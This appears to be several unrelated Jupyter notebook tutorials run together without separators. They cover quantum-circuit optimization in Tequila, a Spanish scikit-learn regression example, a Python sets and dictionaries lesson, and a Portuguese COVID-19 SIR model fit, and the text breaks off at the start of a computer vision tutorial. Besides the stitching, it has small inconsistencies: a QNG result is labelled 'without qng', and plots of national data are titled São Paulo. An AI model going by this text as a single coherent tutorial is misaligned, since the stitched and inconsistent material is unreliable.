### we use the .draw function to pretty-print circuits via backend printers. tq.draw(U,backend='qiskit') print(O)We are ready to optimize, now! like all tequila optimizers, the GD optimizer has a minimize function and most of the arguments are the same. However, there is one important difference: the GD optimizer takes a learning rate, lr. This parameter mediates step size in all of the GD optimizer methods; it is a positive float which scales the step in the direction of the gradient. There are several available optimization methods available to the GD optimizer, including basic SGD, SGD with momentum, and more advanced optimization strategies like Adam or RMS-prop.print('the following methods are available for Gradient Descent optimization:\n') print(tq.optimizers.optimizer_gd.OptimizerGD.available_methods())We will now optimize our chosen expectationvalue, chosing starting angles equivalent to $\frac{1}{4}\pi$ for all four variables, and optimizing via the ['Adam'](https://towardsdatascience.com/adam-latest-trends-in-deep-learning-optimization-6be9a291375c) method.init={'a':0.25,'b':0.25,'c':0.25,'d':0.25} lr=0.1 ### For even more fun, try using sampling with the samples keyword, ### or pick your favorite backend with the 'backend' keyword! result=gd_min(O,lr=lr, method='adam', maxiter=80, initial_values=init, silent=True)The plots below show the trajectory of both the value of the objective and the values of the angles as a function of time.result.history.plot('energies') result.history.plot('angles') print('best energy: ',result.energy) print('optimal angles: ',result.angles)We see that, minus a few hiccups, all the angles converge to optimimum values. Excercise: is this truly the best performance possible, or are we stuck in a local minimum? Let's repeat what we did above, but with a few of the other methods! Here's RMSprop:init={'a':0.25,'b':0.25,'c':0.25,'d':0.25} lr=0.01 result=gd_min(O,lr=lr, method='rmsprop', maxiter=80, initial_values=init, silent=True) print('RMSprop optimization results:') result.history.plot('energies') result.history.plot('angles') print('best energy: ',result.energy) print('optimal angles: ',result.angles)... And here's Momentum:init={'a':0.25,'b':0.25,'c':0.25,'d':0.25} lr=0.1 result=gd_min(O,lr=lr, method='momentum', maxiter=80, initial_values=init, silent=True) print('momentum optimization results:') result.history.plot('energies') result.history.plot('angles') print('best energy: ',result.energy) print('optimal angles: ',result.angles)Note that when using the [RMSprop](https://towardsdatascience.com/understanding-rmsprop-faster-neural-network-learning-62e116fcf29a) method, we reduced the learning rate from 0.1 to 0.01. Different methods may be more or less sensitive to choices of initial learning rate. Try going back to the previous examples, and choosing different learning rates, or different initial parameters, to gain a feel for how sensitive different methods are. 1.1: The GD optimizer, with the Quantum Natural Gradient. The Quantum Natural Gradient, or QNG, is a novel method of calculating gradients for quantum systems, inspired by the natural gradient sometimes employed in classical machine learning. The usual gradient we employ is with respect to a euclidean manifold, but this is not the only geometry -- nor even, the optimal geometry -- of quantum space. The QNG is, in essence, a method of taking gradients with respect to (an approximation to) the Fubini-Study metric. For information on how (and why) the QNG is used, see [Stokes et.al](https://arxiv.org/abs/1909.02108). Using the qng in Tequila is as simple as passing in the keyword qng=True to optimizers which support it, such as the GD optimizer. We will use it to optimize a more complicated circuit below, and then compare the results to optimizing the same circuit with the regular gradient.### this time, don't scale by pi H = tq.paulis.Y(0)*tq.paulis.X(1)*tq.paulis.Y(2) U = tq.gates.Ry(tq.numpy.pi/2,0) +tq.gates.Ry(tq.numpy.pi/3,1)+tq.gates.Ry(tq.numpy.pi/4,2) U += tq.gates.Rz('a',0)+tq.gates.Rz('b',1) U += tq.gates.CNOT(control=0,target=1)+tq.gates.CNOT(control=1,target=2) U += tq.gates.Ry('c',1) +tq.gates.Rx('d',2) U += tq.gates.CNOT(control=0,target=1)+tq.gates.CNOT(control=1,target=2) E = tq.ExpectationValue(H=H, U=U) print('drawing a more complicated circuit. Hope you like it!') tq.draw(U) ### the keyword stop_count, below, stops optimization if no improvement occurs after 50 epochs. ### let's use a random initial starting point: init={k:np.random.uniform(-2,2) for k in ['a','b','c','d']} lr=0.01 result = tq.minimize(objective=E, qng=True, method='sgd', maxiter=200,lr=lr,stop_count=50, initial_values=init, silent=True) result.history.plot('energies') result.history.plot('angles') print('best energy with qng: ',result.energy) print('optimal angles without qng: ',result.angles)To gain appreciation for why one might use the QNG, let's optimize the same circuit with the same learning rate and the same method, but without QNG.lr=0.01 result = tq.minimize(objective=E, qng=False, method='sgd', maxiter=200,lr=lr,stop_count=50, initial_values=init, silent=True) print('plotting what happens without QNG') result.history.plot('energies') result.history.plot('angles') print('best energy without qng: ',result.energy) print('optimal angles without qng: ',result.angles)Though the starting point was random (and so I, your humble tutorial writer, do not know what your graphs look like), you will most likely see that the QNG run achieved a greater degree of improvement, and that the trajectories followed by angles there was different from that followed by angles in the straight-gd optimization. Feel free to play around with other methods, learning rates, or circuits in the space below!### have fun!2. Bayesian Optimization [Bayesian optimization](https://arxiv.org/abs/1807.02811) is a method of global optimization, often used to tune hyperparameters in classical learning. It has also seen use in the optimization of [quantum circuits](https://arxiv.org/pdf/1812.08862.pdf). Tequila currently supports 2 different bayesian optimization algorithms: [Phoenics](https://github.com/aspuru-guzik-group/phoenics) and [GPyOpt](https://github.com/SheffieldML/GPyOpt), optimizers originally developed for optimizing expensive experimental procedures in chemistry. Click the links to get to the respective github pages, and download the optimizers before continuing this tutorial. 2.1: GPyOpt GPyOpt can be used like any of our other optimizers. Like the GD and SciPy optimizers, it also takes a 'method' keyword. 3 methods are supported: 'lbfgs','DIRECT', and 'CMA'. See the GPyOpt github for more info.from tequila.optimizers.optimizer_gpyopt import minimize as gpy_minwe will use GPyOpt to optimize the same circuits as seen above.### optimizing the circuit in terms of pi makes the result of the optimization easier to interpret. a = tq.Variable(name="a")*tq.numpy.pi b = tq.Variable(name="b")*tq.numpy.pi c = tq.Variable(name="c")*tq.numpy.pi d = tq.Variable(name='d')*tq.numpy.pi U = tq.gates.H(target=[0]) U += tq.gates.H(target=1) U += tq.gates.Ry(target=0, angle=a) U += tq.gates.Rz(target=1, angle=b) U += tq.gates.Z(target=1,control=0) U += tq.gates.Rx(target=0, angle=c) U += tq.gates.Rx(target=1,angle=d) U += tq.gates.Z(target=1,control=0) ### once we have a circuit, we pick a hamiltonian to optimize over H=(tq.paulis.Y(0)+tq.paulis.Qm(0))*tq.paulis.X(1) O=tq.ExpectationValue(U=U,H=H) ### we use the .draw function to pretty-print circuits via backend printers. tq.draw(U,backend='qiskit') print(O) ### let's use the lbfgs method. init={'a':0.25,'b':0.25,'c':0.25,'d':0.25} ### note: no lr is passed here! there are fewer tunable keywords for this optimizer. result=gpy_min(O, method='lbfgs', maxiter=80, initial_values=init) print('GPyOpt optimization results:') result.history.plot('energies') result.history.plot('angles') print('best energy: ',result.energy) print('optimal angles: ',result.angles)Perhaps you are looking at the plots above in horror. But, do take note: bayesian optimization is a global, exploratory optimization method, designed to explore large portions of parameter space while still seeking out optimality. Look at the optimal energy again, and one sees that the best performance of this optimization method matched that of all the gradient descent methods. We will apply gpyopt, next, to the QNG example circuit above, and see how bayesian optimization compares to QNG and SGD.### this time, don't scale by pi H = tq.paulis.Y(0)*tq.paulis.X(1)*tq.paulis.Y(2) U = tq.gates.Ry(tq.numpy.pi/2,0) +tq.gates.Ry(tq.numpy.pi/3,1)+tq.gates.Ry(tq.numpy.pi/4,2) U += tq.gates.Rz('a',0)+tq.gates.Rz('b',1) U += tq.gates.CNOT(control=0,target=1)+tq.gates.CNOT(control=1,target=2) U += tq.gates.Ry('c',1) +tq.gates.Rx('d',2) U += tq.gates.CNOT(control=0,target=1)+tq.gates.CNOT(control=1,target=2) E = tq.ExpectationValue(H=H, U=U) print('Hey, remember me?') tq.draw(U) ### the keyword stop_count, below, stops optimization if no improvement occurs after 50 epochs. ### let's use a random initial starting point: init={k:np.random.uniform(-2,2) for k in ['a','b','c','d']} result = gpy_min(objective=E,maxiter=25,method='lbfgs', initial_values=init) result.history.plot('energies') print('best energy: ',result.energy) print('optimal angles: ',result.angles)In a very, very small number of step, GPyOpt is able to match the performance of SGD with the QNG, and discovers the hidden truth: the optimil circuit, here, is one where all angles are zero (modulo 2 $\pi$) Feel free to play around more with other circuits in the space below! 2.2 Phoenics Finally, we turn to Phoenics. This algorithm, originally developed within the Aspuru-Guzik group (Hey, just like Tequila!), can be accessed in the usual fashion. It's performance on the two-qubit optimization circuit is shown below. Note that the number of datapoints exceeds the provided maxiter; maxiter here controls the number of parameter __batches__ suggested by phoenics. phoenics suggests a number of parameter sets to try out, per batch, that scales with the number of parameters (in a nonlinear fashion), so you may want to set maxiter lower if you are only playing around.from tequila.optimizers.optimizer_phoenics import minimize as p_min ### optimizing the circuit in terms of pi makes the result of the optimization easier to interpret. a = tq.Variable(name="a")*tq.numpy.pi b = tq.Variable(name="b")*tq.numpy.pi c = tq.Variable(name="c")*tq.numpy.pi d = tq.Variable(name='d')*tq.numpy.pi U = tq.gates.H(target=[0]) U += tq.gates.H(target=1) U += tq.gates.Ry(target=0, angle=a) U += tq.gates.Rz(target=1, angle=b) U += tq.gates.Z(target=1,control=0) U += tq.gates.Rx(target=0, angle=c) U += tq.gates.Rx(target=1,angle=d) U += tq.gates.Z(target=1,control=0) H=(tq.paulis.Y(0)+tq.paulis.Qm(0))*tq.paulis.X(1) O=tq.ExpectationValue(U=U,H=H) init={'a':0.25,'b':0.25,'c':0.25,'d':0.25} ### geez! even fewer keywords! ### to see what you can pass down to phoenics, see the tequila documentation for that module. result=p_min(O, maxiter=5, initial_values=init, silent=True) print('Phoenics optimization results on 2 qubit circuit:') result.history.plot('energies') result.history.plot('angles') print('best energy: ',result.energy) print('optimal angles: ',result.angles)Scikit-learnLa página oficial de Scitit-learn es [aquí](https://scikit-learn.org/stable/index.html). Ejemplo: Regresión Lineal MúltipleAhora veamos un ejemplo, siguiendo los pasos para hacer un ajuste.# Se cargan las librerías que se van a utilizar import numpy as np import math import matplotlib.pyplot as plt import pandas as pd import seaborn as sns import sklearn from sklearn.model_selection import train_test_split from sklearn.linear_model import LinearRegression from sklearn.metrics import r2_score from sklearn.metrics import mean_squared_error ## 1) EXTRAER DATOS # Los datos pueden encontrarse en diferentes formatos, en nuestro caso están en formato csv. # Se carga la base de datos y se definen las varibles X y Y datos = pd.read_csv('50_Startups.csv') #Se encuentra en la misma carpeta que el jupyter notebook X = pd.DataFrame(datos.iloc[:, :-1].values) #Se convierte en data frame X.columns = datos.columns[:-1] #Ponemos los nombres de las columnas Y = datos.iloc[:, 4].values #Ganancia print("type(datos): ",type(datos)) print("type(X)",type(X)) print("type(Y)",type(Y)) ## 2) ANÁLISIS EXPLORATORIO # Se realiza una descripción analítica de los datos. # Se muestran los primeros 5 datos del data frame datos.head() # Los datos corresponden a la información de 50 empresas nuevas. La información que se tiene de cada una de ellas es: #R&D = Research and development: Gastos de investigación y desarrollo #Administration: Gastos administrativos #Marketing Spend: Gastos en las técnicas de comercialización de algún producto #State: Estado en el que se encuentra la empresa #Profit: Ganancia # Dimensiones del data frame datos.shape # Se cuenta el número de NaN's por columna datos.isnull().sum() # Cuenta los valores repetidos de la columna 1 (R&D Spend) datos["R&D Spend"].value_counts().head() # Cuenta los valores repetidos de la columna 4 (R&D Spend) datos["State"].value_counts() #Se muestran las variables dummies pd.get_dummies(X['State']).head() '''Se convierte la columna "State" en una columna categórica. Se elimina la columna de "California" porque se puede obtener su valor cuando las columnas "Florida" y "New York" son ambas 0 en el i-ésimo renglón.''' estados = pd.get_dummies(X['State'],drop_first=True) estados.head() #Se cambia la columna "State" por las variables dummies creadas print(X.head()) X=X.drop('State',axis=1) X=pd.concat([X,estados],axis=1) X.head() ## 3) VISUALIZACIÓN DE LOS DATOS # Para entender mejor los datos es necesario graficarlos. sns.distplot(Y)#Ganancia #R&D = Research and development: Gastos de investigación y desarrollo print(min(X['R&D Spend'])) print(max(X['R&D Spend'])) #Histograma de la columna "R&D Spend" plt.hist(X['R&D Spend'], bins=[0,25000,50000,75000,100000, 125000,150000,175000]) #División cada 25 mil plt.title('Histograma de la columna "R&D Spend"') plt.xlabel('Unidades monetarias') plt.ylabel('Número de empresas') plt.show() #Administration: Gastos administrativos print(min(X['Administration'])) print(max(X['Administration'])) #Histograma de la columna "Administration" plt.hist(X['Administration'], bins=[50000,75000,100000,125000, 150000,175000,200000]) #División cada 25 mil plt.title('Histograma de la columna "Administration"') plt.xlabel('Unidades monetarias') plt.ylabel('Número de empresas') plt.show() #Marketing Spend: Gastos en las técnicas de comercialización de algún producto print(min(X['Marketing Spend'])) print(max(X['Marketing Spend'])) #Histograma de la columna "Marketing Spend" plt.hist(X['Marketing Spend'], bins=[0,50000,100000,150000,200000,250000, 300000,350000,400000,450000,500000]) #División cada 50 mil plt.title('Histograma de la columna "Marketing Spend"') plt.xlabel('Unidades monetarias') plt.ylabel('Número de empresas') plt.show() #State: Estado en el que se encuentra la empresa #Histograma de la columna "State" plt.hist(datos['State']) plt.title('Histograma de la columna "State"') plt.xlabel('Estado') plt.ylabel('Número de empresas') #17 17 16 plt.show() sns.boxplot(x="R&D Spend", data=datos) round(np.mean(X['R&D Spend']),2) #Promedio de gastos por investigación y desarrollo sns.boxplot(x="Administration", data=datos) round(np.mean(X['Administration']),2) #Promedio de gastos por administración sns.boxplot(x="Marketing Spend", data=datos) round(np.mean(X['Marketing Spend']),2) #Promedio de gastos por "marketing" sns.boxplot(x=Y, data=datos) round(np.mean(Y),2) #Promedio de ganancias min(Y) #Outlier #Se muestra la correlación entre las variables sns.pairplot(datos) ## 4) DIVIDIR LOS DATOS # Se separan los datos en 2 grupos (usualmente 80% y 20%): # i) Para entrenar al modelo (80%) # ii) Para probar el modelo (20%) X_train, X_test, Y_train, Y_test = train_test_split(X, Y, #Se indican los vectores que se van a dividir test_size = 0.2, #Se indica el porcentajede los datos para probar el modelo random_state = 0) #Se fija la semilla # Nota: Tomar la muestra aleatoria es muy importante porque en caso de que los datos estén #ordenados el algoritmo no aprende adecuadamente. Por ejemplo si tenemos 80 sanos y 20 enfermos, #sólo se tomarían los 80 sanos (por ser los primeros 80). ## 5) CONSTRUIR UN MODELO # En este ejemplo vamos a elegir un modelo de regresión lineal simple para "X_train" regresor = LinearRegression() regresor.fit(X_train, Y_train) ## 6) PREDICCIONES # Se hacen las predicciones con "X_test" Y_pred = regresor.predict(X_test) # Se grafican los resultados de la predicción. plt.scatter(Y_test, Y_pred, color = 'black') plt.title('Predicciones') plt.xlabel('Ganancia real') plt.ylabel('Ganancia estimada') plt.show() #Nota: No estamos graficando contra ninguna variable explicativa (R&D, Administration, Marketing Spend, State). #Los valores de las predicciones se graficaron contra la ganancia real.7) EVALUACIÓN DEL MODELOVeamos cómo se comporta el modelo:7.1 Calcular $R^{2}$ ajustada $ = 1 - \dfrac{(1 - R^{2}) (n-1)}{n - p - 1}$, donde$R^{2}:$ R cuadrada de los datos$n:$ Número de datos para entrenar al modelo$p:$ Número de variables independientes7.2 Calcular los errores absolutos $(real - estimado)$ y graficarlos7.3 Calcular los errores relativos $\left( \dfrac{\text{real - estimado}}{\text{real}} \right)$ y graficarlos7.4 Graficar valores estimados vs valores reales7.5 Calcular el error cuadrático: $(real − estimado)^{2}$7.6 Calcular el error cuadrático medio: $\dfrac{\displaystyle \sum_{i = 1}^{n} (real_{i} − estimado_{i})^{2}}{n}$#7.1 Calcular R^2 ajustada r_cuadrada = r2_score(Y_test,Y_pred) print('R^2 = ',round(r_cuadrada,3)) #Porcentaje de los datos explicados por el modelo #R^2 ajustada n = len(Y_train) p = X_train.shape[1] r_cuad_aj = 1 - (((1-r_cuadrada)*(n-1))/(n-p-1)) print('n = ',n) print('p = ',p) print('R^2_aj = ',round(r_cuad_aj,3)) #R^2 ajustada se utiliza para comparar modelos que tengan diferente número de predictores. #R^2 siempre aumenta cuando se agrega un predictor al modelo, aún cuando no haya una mejora real en el modelo. #7.2 Calcular los errores absolutos (real - estimado) y graficarlos err_abs = Y_test-Y_pred print(np.around(err_abs,2)) plt.scatter(Y_test, err_abs, color = 'blue') plt.plot(Y_test, np.zeros(len(err_abs)), color = 'midnightblue') #Recta en Y = 0 plt.title('Errores absolutos (real - estimado)') plt.xlabel('Ganancia real') plt.ylabel('Errores absolutos') plt.show() #7.3 Calcular los errores relativos [(real - estimado)/real] y graficarlos err_rel = err_abs/Y_test print(np.around(err_rel,3)) plt.scatter(Y_test, err_rel, color = 'blue') plt.plot(Y_test, np.zeros(len(err_abs)), color = 'midnightblue') #Recta en Y = 0 plt.title('Errores relativos [(real - estimado)/real]') plt.xlabel('Ganancia real') plt.ylabel('Errores relativos') plt.show() #7.4 Graficar valores estimados vs valores reales X = range(1,len(Y_test)+1) plt.plot(X, sorted(Y_test), color = 'black') #Recta de valores reales plt.plot(X, sorted(Y_pred), color = 'red') #Recta de valores estimados plt.title('Valores estimados vs valores reales') plt.xlabel('Índices') plt.ylabel('Ganancia') plt.show() #Nota: Tanto los valores reales como los estimados se ordenaron de menor a mayor. #7.5 Calcular el error cuadrático = (real − estimado)^2 #print(np.around(err_abs,2)) err_cuad = pow(err_abs,2) print(err_cuad) #7.6 Calcular el error cuadrático medio = (1/n) * \sum (real − estimado)^2 ''' Indica qué tan cerca está la línea de la regresión lineal de los valores estimados. i) Se elevan al cuadrado los errores absolutos. ii) Se suman. iii) Se divide el resultado entre el número de datos estimados. ''' err_cuad_medio = mean_squared_error(Y_test, Y_pred) print(round(err_cuad_medio,2)) print(round(math.sqrt(err_cuad_medio),2))#Raíz cuadrada del error cuadrático medio #Graficamos los errores cuadráticos Y= np.repeat(err_cuad_medio, len(err_cuad)) plt.scatter(Y_test, err_cuad, color = 'blue') plt.plot(Y_test,Y , color = 'lime') #Recta en Y = err_cuad_medio plt.title('Errores cuadráticos: (real − estimado)^2') plt.xlabel('Ganancia real') plt.ylabel('Errores cuadráticos') plt.show()Lesson 6: Sets and Dictionaries**Teaching**: 15min**Exercises**: 5min Use a set to store unique values* Create with `{...}`* But must use `set()` to create an empty setprimes = {2, 3, 5, 7} print('is 3 prime?', 3 in primes) print('is 9 prime?', 9 in primes)is 3 prime? True is 9 prime? False* Intersection, union, etc.odds = {3, 5, 7, 9} print('intersection', odds & primes) print('union', odds | primes)intersection {3, 5, 7} union {2, 3, 5, 7, 9}Sets are mutable* But only store *unique* valuesprimes.add(11) print('primes becomes', primes) primes.discard(7) print('after removal', primes) primes.add(11) print('after adding 11 again', primes)primes becomes {2, 3, 5, 7, 11} after removal {2, 3, 5, 11} after adding 11 again {2, 3, 5, 11}Sets are unordered* Values are stored by *hashing*, which is intentionally as random as possiblenames = {'Hopper', 'Cori', 'Kohn'} for n in names: print(n)Cori Kohn HopperUse a dictionary to store key/value pairsEquivalently, store extra information with elements of a set.birthdays = {'Hopper': 1906, 'Cori': 1896} print(birthdays['Hopper']) birthdays['Kohn'] = 1823 # oops birthdays['Kohn'] = 1923 # that's better print(birthdays)1906 {'Hopper': 1906, 'Cori': 1896, 'Kohn': 1923}* Just an accident that keys are in order of when entered.* Like sets, dictionaries store keys by hashing, which is as random as possible Set values and dictionary keys must be immutable* Changing them after insertion would leave data in the wrong place* Use a `tuple` for multi-valued keyspeople = {('Grace', 'Hopper'): 1906, ('Gerty', 'Cory'): 1896, ('Walter', 'Kohn'): 1923}You can *destructure* a tuple in the heading of a for loop:for (first, last) in people: print(first,'was born in', people[(first, last)])Grace was born in 1906 Gerty was born in 1896 Walter was born in 1923Example: create a histogramnumbers = [1, 0, 1, 2, 0, 0, 1, 2, 1, 3, 1, 0, 2] count = {} for n in numbers: if n not in count: count[n] = 1 else: count[n] = count[n] + 1 print(count){1: 5, 0: 4, 2: 3, 3: 1}Reminder: there are lots of useful Python libraries, especially the "standard library" that comes with Python:from collections import Counter print(Counter(numbers)) print(dict(Counter(numbers)))Counter({1: 5, 0: 4, 2: 3, 3: 1}) {1: 5, 0: 4, 2: 3, 3: 1}Keys are often stringsatomic_numbers = {'H' : 1, 'He' : 2, 'Li' : 3, 'Be' : 4, 'B' : 5} print('atomic number of lithium:', atomic_numbers['Li']) from mp_workshop.data import atomic_numbers for element in ('H', 'C', 'O'): print('atomic number of', element, 'is', atomic_numbers[element])atomic number of H is 1 atomic number of C is 6 atomic number of O is 8You can iterate over the keys of a dictionary:# Use a counter so we don't print out so much. n = 0 for element in atomic_numbers: if n < 5: print(element) n = n + 1H He Li Be BYou can also iterate over (key, value) tuples of a dictionary using the `items` method:n = 0 for (element, atomic_number) in atomic_numbers.items(): if n < 5: print(element, atomic_number) n = n + 1H 1 He 2 Li 3 Be 4 B 5Exercise: How heavy is this molecule?You are given two things:1. a dictionary mapping atomic symbols to atomic weights (`mp_workshop.data.atomic_weights`), and2. a list of (atomic_symbol, count) pairs for a molecule.```python Example molecules:methane = [('C', 1), ('H', 4)]aminothiazole = [('C', 3), ('H', 4), ('N', 2), ('S', 1)]```Print that molecule's molecular weight.from mp_workshop.data import atomic_weights # atomic weight is 16.0423 methane = [('C', 1), ('H', 4)] # atomic weight is 100.1421 aminothiazole = [('C', 3), ('H', 4), ('N', 2), ('S', 1)] # 2. Pick a molecule to test molecule = methane # 3. Do stuff to calculate `mol_weight` # ... #print(mol_weight)Os dadosLendo e visualizandos os dados do Brasil do COVID fornecidos por- [](https://github.com/wcota/covid19br)Os dados são atualizados diariamente... Então normalmente a cada dia esse pipeline pode mudar seus resultados.import pandas as pd # Lendo os dados online - wcota data_path = 'https://raw.githubusercontent.com/wcota/covid19br/master/cases-brazil-states.csv' online_data = pd.read_csv(data_path, delimiter=",") online_data.head()Filtrando e limpando os dadosselected_state = "TOTAL" at_state = online_data['state']==selected_state local_data = online_data[at_state] local_data = local_data[local_data.recovered.notnull()] #local_data = local_data.fillna(method="backfill") local_data.head() import numpy as np from datetime import datetime first_date = local_data["date"].iloc[0] first_date = datetime.fromisoformat(first_date) if selected_state == "SP": # N = 11869660 N = 44.01e6 elif selected_state == "TOTAL": N = 220e6 I = list() # <- I(t) R = local_data["recovered"].iloc[1:].to_numpy() # <- R(t) M = local_data["newDeaths"].iloc[1:].to_numpy() # <- M(t) nR = np.diff(local_data["recovered"].to_numpy()) # <- dR(t)/dt nC = local_data["newCases"].iloc[1:].to_numpy() # <- nC(t)/dt I = [ local_data["totalCases"].iloc[1] ] # I(0) # I(t) <- I(t-1) + newCases(t) - newMortes(t) - newRecovered(t) for t in range(len(M)-1): I.append(I[-1] + nC[t] - M[t] - nR[t]) I = np.array(I)Visualizando a evoluçãofrom bokeh.models import Legend, ColumnDataSource, RangeTool, LinearAxis, Range1d, HoverTool from bokeh.palettes import brewer, Inferno256 from bokeh.plotting import figure, show from bokeh.layouts import column from bokeh.io import output_notebook output_notebook() from datetime import timedelta # Criando o vetor de tempo date_vec = [ first_date + timedelta(days=k) for k in range(len(M))] # Criando os valores para legenda no plot year = [str(int(d.year)) for d in date_vec ] month = [("0"+str(int(d.month)))[-2:] for d in date_vec ] day = [("0"+str(int(d.day)))[-2:] for d in date_vec ] # Criando a fonte de dados source = ColumnDataSource(data={ 'Data' : date_vec, 'd': day, 'm': month, 'y': year, 'Infectados' : I, 'Removidos' : R, 'Mortes' : M, }) # Criando a figura p = figure(plot_height=500, plot_width=600, x_axis_type="datetime", tools="", toolbar_location=None, # y_axis_type="log", title="Evolução do COVID - São Paulo") # Preparando o estilo p.grid.grid_line_alpha = 0 p.ygrid.band_fill_color = "olive" p.ygrid.band_fill_alpha = 0.1 p.yaxis.axis_label = "Indivíduos" p.xaxis.axis_label = "Dias" # Incluindo as curvas i_p = p.line(x='Data', y='Infectados', legend_label="Infectados", line_cap="round", line_width=3, color="#ffd885", source=source) m_p = p.line(x='Data', y='Mortes', legend_label="Mortes", line_cap="round", line_width=3, color="#de425b", source=source) r_p = p.line(x='Data', y='Removidos', legend_label="Removidos", line_cap="round", line_width=3, color="#99d594", source=source) # Colocando as legendas p.legend.click_policy="hide" p.legend.location = "top_left" # Incluindo a ferramenta de hover p.add_tools(HoverTool( tooltips=[ ( 'Indivíduos', '$y{i}'), ( 'Data', '@d/@m/@y' ), ], renderers=[ r_p, i_p, m_p ] )) show(p)O problemaO conjunto de equações diferenciais que caracteriza o modelo é descrito abaixo. No modelo $\beta - \text{representa a taxa de transmissão ou taxa efetiva de contato} $ e $r - \text{a taxa de remoção ou recuperação.}$ $$ \begin{split} \frac{dS(t)}{dt} & = -\beta S(t) I(t) \\ \frac{dI(t)}{dt} & = \beta S(t) I(t) - rI(t) \\ \frac{dR(t)}{dt} & = r I(t) \end{split}$$ Gostaríamos de identificar quais parâmetros $\beta$ e $r$ resultam num melhor ajuste do modelo para os dados de **S**,**I** e **R**# Importando o modelo SIR from models import * sir_model = ss.SIR(pop=N, focus=["I", "R"])Estimando os parâmetrosPara estimarmos os parâmetros do modelo $\mathbf{\beta}$ e $\mathbf{r}$, vamos utilizar inicialmente o método de mínimos quadrados. Podemos então formular o problema a partir da Equação abaixo. Na Equação $y_m(k)$ representa o dado real em cada amostra $k$; $y_s(\theta,k)$ representa o **valor estimado** a partir da simulação do modelo para uma determinada amostra $k$ e $\theta$ representa o vetor ed parâmetros $\theta = [ \beta \; \; r]^T$. $$ min_{\theta}= \sum_{k=1}^{K}(y_m(k) - y_s(\theta,k))^2 $$A equação formula a pergunta: quais os valores de $beta$ e $r$ que minizam o erro quadrático quando comparados com os dados reais.import numpy as np S = N - I - R time = np.linspace(0, len(I), len(I)) # Estimando os parâmetros sir_model.fit(S, I, R, time, sample_ponder=True, resample=True, beta_sens=[1000,10], r_sens=[1000,10]) r_included = True sir_model.parameters[0]/sir_model.parameters[1] # Ro <- \beta * (1 / \r) # Criando a figura p1 = figure(plot_height=500, plot_width=600, x_axis_type="datetime", tools="", toolbar_location=None, # y_axis_type="log", title="Evolução do COVID - São Paulo") # Preparando o estilo p1.grid.grid_line_alpha = 0 p1.ygrid.band_fill_color = "olive" p1.ygrid.band_fill_alpha = 0.1 p1.yaxis.axis_label = "Indivíduos" p1.xaxis.axis_label = "Dias" # Incluindo as curvas p1.line(time, I, legend_label="Infectados", line_cap="round", line_width=3, color="#ffd885") #p1.line(time, , legend_label="Mortes", line_cap="round", line_width=3, color="#de425b") p1.line(time, R, legend_label="Removidos", line_cap="round", line_width=3, color="#99d594") p1.scatter(sir_model.pipeline["resample"]["after"]["t"], sir_model.pipeline["resample"]["after"]["I"], marker="circle",line_color="#6666ee", fill_color="#ee6666", fill_alpha=0.5, size=3) p1.scatter(sir_model.pipeline["resample"]["after"]["t"], sir_model.pipeline["resample"]["after"]["R"], marker="circle",line_color="#6666ee", fill_color="#ee6666", fill_alpha=0.5, size=3) # Colocando as legendas p1.legend.click_policy="hide" p1.legend.location = "top_left" show(p1) if r_included: initial = [S[0], I[0], R[0]] else: initial = [S[0], I[0]] results = sir_model.predict(initial, time) # Incluindo os dados de infectados im_p = p.line( date_vec, results[1], legend_label="Infectados - Modelo", line_width=4, line_dash="dashed", line_cap="round", color="#f57f17" ) # Incluindo os dados de recuperados if r_included: rm_p = p.line( date_vec, results[2], legend_label="Removidos - Modelo", line_dash="dashed", line_width=4, line_cap="round", color="#1b5e20" ) show(p)Predições utilizando o modelo# Criando os valores de tempo para previsão - 120 dias t_sim = np.linspace(0, len(I) + 120, len(I) + 120) date_vec_sim = [first_date + timedelta(days=k) for k in t_sim] # Prevendo para os valores selecionados prediction = sir_model.predict(initial, t_sim) # Criando o gráfico com as predições # Criando os valores para legenda no plot year_sim = [str(int(d.year)) for d in date_vec_sim ] month_sim = [("0"+str(int(d.month)))[-2:] for d in date_vec_sim ] day_sim = [("0"+str(int(d.day)))[-2:] for d in date_vec_sim ] if r_included: accum_Infect = [0] for i in N - prediction[1] - prediction[2]: accum_Infect.append(accum_Infect[-1]+i) accum_Infect = sir_model.parameters[1] * np.array(accum_Infect) # Criando a fonte de dados if r_included: source = ColumnDataSource(data={ 'Data' : date_vec, 'd': day, 'm': month, 'y': year, 'Infectados' : I, 'Removidos' : R, 'Mortes' : M, 'InfecModelo' : prediction[1], 'RemovModelo' : prediction[2], 'AccumInfect' : accum_Infect, 'SucetModelo' : N - prediction[1] - prediction[2], 'DataModelo' : date_vec_sim, 'ds': day_sim, 'ms': month_sim, 'ys': year_sim }) else: source = ColumnDataSource(data={ 'Data' : date_vec, 'd': day, 'm': month, 'y': year, 'Infectados' : I, 'Removidos' : R, 'Mortes' : M, 'InfecModelo' : prediction[1], 'DataModelo' : date_vec_sim, 'ds': day_sim, 'ms': month_sim, 'ys': year_sim }) # Criando a figura p = figure(plot_height=700, plot_width=800, x_axis_type="datetime", tools="", toolbar_location=None, y_axis_type="log", title="Previsão do COVID - Brasil") # Preparando o estilo p.grid.grid_line_alpha = 0 p.ygrid.band_fill_color = "olive" p.ygrid.band_fill_alpha = 0.1 p.yaxis.axis_label = "Indivíduos" p.xaxis.axis_label = "Dias" # Incluindo as curvas i_p = p.line(x='Data', y='Infectados', legend_label="Infectados", line_cap="round", line_width=3, color="#ffd885", source=source) m_p = p.line(x='Data', y='Mortes', legend_label="Mortes", line_cap="round", line_width=3, color="#de425b", source=source) r_p = p.line(x='Data', y='Removidos', legend_label="Removidos", line_cap="round", line_width=3, color="#99d594", source=source) mp_p = p.line(x='DataModelo', y='InfecModelo', legend_label="Infectados - Modelo", line_dash="dashed", line_cap="round", line_width=4, color="#f57f17", source=source) renders = [i_p, m_p, r_p, mp_p] if r_included: rp_p = p.line(x='DataModelo', y='RemovModelo', legend_label="Removidos - Modelo", line_dash="dashed", line_cap="round", line_width=4, color="#1b5e20", source=source) renders.append(rp_p) # Colocando as legendas p.legend.click_policy="hide" p.legend.location = "top_left" # Incluindo a ferramenta de hover p.add_tools(HoverTool( tooltips=[ ( 'Indivíduos', '$y{0.00 a}' ), ( 'Data', '@ds/@ms/@ys'), ], renderers=renders )) show(p)BokehUserWarning: ColumnDataSource's columns must be of the same length. Current lengths: ('AccumInfect', 186), ('Data', 65), ('DataModelo', 185), ('InfecModelo', 185), ('Infectados', 65), ('Mortes', 65), ('RemovModelo', 185), ('Removidos', 65), ('SucetModelo', 185), ('d', 65), ('ds', 185), ('m', 65), ('ms', 185), ('y', 65), ('ys', 185)Computer Vision - Tutorial 3 In this practical session, we will use the 